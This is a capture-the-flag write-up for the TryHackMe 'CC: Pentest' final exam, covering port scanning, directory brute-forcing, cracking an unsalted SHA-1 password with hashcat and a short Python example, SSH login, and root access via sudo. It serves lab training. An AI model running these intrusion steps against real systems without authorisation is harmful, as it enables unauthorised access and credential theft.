TryHackMe - CC Pentest Final Exam Writeup

Intro

This writeup is a walkthrough of the Final Exam of THM's CC: Pentest room, which can be found here. The objective is to find the user flag and the root flag.

Tools and techniques used: Nmap, Gobuster, hashid, Hashcat, and privilege escalation via sudo.

Analysis

Nmap

For information gathering and enumeration, I started off with an NMAP stealth scan.

nmap -p- -v --min-parallelism 100 -sV 10.10.24.168

Here, -p- scans all 65,535 TCP ports, -v turns on verbose output, --min-parallelism 100 sets a minimum number of probes to send in parallel (which speeds up the scan), and -sV detects the version of each service running on the target.

The results of the scan were as follows:

Nmap scan report for 10.10.24.168
Host is up (0.31s latency).
Not shown: 65532 closed ports
PORT      STATE    SERVICE VERSION
22/tcp    open     ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp    open     http    Apache httpd 2.4.18 ((Ubuntu))
62157/tcp filtered unknown
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

So there are two open ports, running SSH and Apache. We'll come back to these later, if needed.

GoBuster

Gobuster is a directory brute-forcing tool that searches for hidden directories on the port 80 web server. Let's run the command below and see what it outputs:

gobuster dir -u 10.10.24.168 -w /usr/share/seclists/Discovery/Web-Content/common.txt

The output was:

===============================================================
2020/10/21 22:27:08 Starting gobuster
===============================================================
/.hta (Status: 403)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/index.html (Status: 200)
/secret (Status: 301)
/server-status (Status: 403)
===============================================================
2020/10/21 22:31:48 Finished
===============================================================

Aha! There's a directory called 'secret' on the server. However, nothing is displayed when I visit it and there is nothing interesting in the page source either, so I ran gobuster again against that directory.

gobuster dir -u 10.10.24.168/secret -w /usr/share/seclists/Discovery/Web-Content/common.txt

And this time I found:

/index.html (Status: 200)

Nothing again, but the hint says to check for different extensions, so let's try other extensions such as .txt.

gobuster dir -u 10.10.24.168/secret -w /usr/share/seclists/Discovery/Web-Content/common.txt -x .txt

This reveals a 'secret.txt' file. When I open it, I see:

nyan:046385855FC9580393853D8E81F240B66FE9A7B8

This looks like a username and credential for the SSH service found in the earlier Nmap scan. Let's use it to connect to the SSH server.

ssh nyan@10.10.24.168

But using the value above as the password doesn't work. As I suspected, the password is stored as a hash, so I used hashid to identify the hash type.

hashid 046385855FC9580393853D8E81F240B66FE9A7B8

And the results pointed to SHA-1.

To crack this, let’s use hashcat as below.

hashcat -m 100 hash /usr/share/wordlists/rockyou.txt --force

The -m flag sets the hash mode; 100 is hashcat's mode for raw, unsalted SHA-1, and hash is a text file I stored the digest in.
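To make concrete what hashid and hashcat -m 100 are doing here, the following is an added example (not part of the original writeup): it classifies a bare hex digest by its length, the same rule that flags 40 hex characters as SHA-1, and then runs the unsalted-SHA-1 dictionary check that mode 100 performs. The demo account, its digest and the wordlist are constructed for this example, not taken from the room.

```python
import hashlib
import re
from typing import Iterable, List, Optional, Tuple

# Digest length in hex characters -> unsalted algorithms that produce it.
# This is the same length-based classification hashid applies.
_HEX_LEN_TO_ALGOS = {
    32: ["MD5", "NTLM"],
    40: ["SHA-1", "RIPEMD-160"],
    64: ["SHA-256"],
    128: ["SHA-512"],
}


def identify_hex_digest(digest: str) -> List[str]:
    """Return candidate unsalted algorithms for a bare hex digest (empty if it is not hex)."""
    if not re.fullmatch(r"[0-9a-fA-F]+", digest):
        return []
    return _HEX_LEN_TO_ALGOS.get(len(digest), [])


def parse_secret_line(line: str) -> Tuple[str, str]:
    """Split a 'user:digest' line of the form found in secret.txt."""
    user, _, digest = line.strip().partition(":")
    if not user or not digest:
        raise ValueError(f"expected user:digest, got {line!r}")
    return user, digest


def crack_sha1(digest: str, candidates: Iterable[str]) -> Optional[str]:
    """The check hashcat -m 100 performs: SHA-1 each candidate and compare.

    Hex case is ignored, which is why the uppercase digest in secret.txt and
    hashcat's lowercase output refer to the same hash.
    """
    target = digest.lower()
    for word in candidates:
        word = word.rstrip("\r\n")
        if hashlib.sha1(word.encode()).hexdigest() == target:
            return word
    return None


# Constructed sample data: a made-up account whose password is in the list.
SAMPLE_LINE = "demo:" + hashlib.sha1(b"password123").hexdigest().upper()
SAMPLE_WORDLIST = ["letmein", "qwerty", "password123", "nyancat"]

if __name__ == "__main__":
    user, digest = parse_secret_line(SAMPLE_LINE)
    print(user, identify_hex_digest(digest), crack_sha1(digest, SAMPLE_WORDLIST))
```

Because the digest is unsalted and SHA-1 is fast, a wordlist hit like the one above costs a fraction of a second; that is the weakness this room's secret.txt demonstrates.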

The results of this crack were as follows:

046385855fc9580393853d8e81f240b66fe9a7b8:[redacted]
Session..........: hashcat
Status...........: Cracked
Hash.Name........: SHA1
Hash.Target......: 046385855fc9580393853d8e81f240b66fe9a7b8
Time.Started.....: Wed Oct 21 23:00:00 2020, (1 sec)
Time.Estimated...: Wed Oct 21 23:00:01 2020, (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  3480.8 kH/s (0.57ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 4972544/14344385 (34.67%)
Rejected.........: 0/4972544 (0.00%)
Restore.Point....: 4964352/14344385 (34.61%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: o103192 -> nwcfleshwound

Success! The SSH password is as seen above next to the hash. Let’s use that to login to the SSH server.

User

After logging in, running ls shows user.txt, which contains the user flag.

nyan@ubuntu:~$ ls
user.txt
nyan@ubuntu:~$ cat user.txt
[redacted]
nyan@ubuntu:~$ 

Now onto the root flag!

If I list every file in the home directory, including hidden ones:

nyan@ubuntu:~$ ls -latr
total 36
drwxr-xr-x 3 root root 4096 Dec 20  2019 ..
-rw-r--r-- 1 nyan nyan  655 Dec 20  2019 .profile
-rw-r--r-- 1 nyan nyan 3771 Dec 20  2019 .consolerc
-rw-r--r-- 1 nyan nyan  220 Dec 20  2019 .console_logout
drwx------ 2 nyan nyan 4096 Dec 20  2019 .cache
-rw-r--r-- 1 nyan nyan    0 Dec 20  2019 .sudo_as_admin_successful
drwxrwxr-x 2 nyan nyan 4096 Dec 20  2019 .nano
-rw-rw-r-- 1 nyan nyan   14 Dec 20  2019 user.txt
-rw------- 1 nyan nyan   16 Dec 20  2019 .console_history
drwxr-xr-x 4 nyan nyan 4096 Dec 20  2019 .

Root

There's a hidden file, .console_history; opening it, I saw three lines of previous history.

su
sudo su
exit

When I ran the second line, I got a root shell. The sudo binary is always setuid root; what makes this work is that nyan is permitted to run sudo in the first place, which the .sudo_as_admin_successful file in the home directory already hinted at.

nyan@ubuntu:~$ sudo su
root@ubuntu:/home/nyan# whoami
root
root@ubuntu:/home/nyan# 

And so:

root@ubuntu:/home/nyan# cd ../..
root@ubuntu:/# cd root
root@ubuntu:~# ls
root.txt
root@ubuntu:~# cat root.txt
[redacted]

We have successfully found the root flag and thereby finished this exam.

Thanks for following along.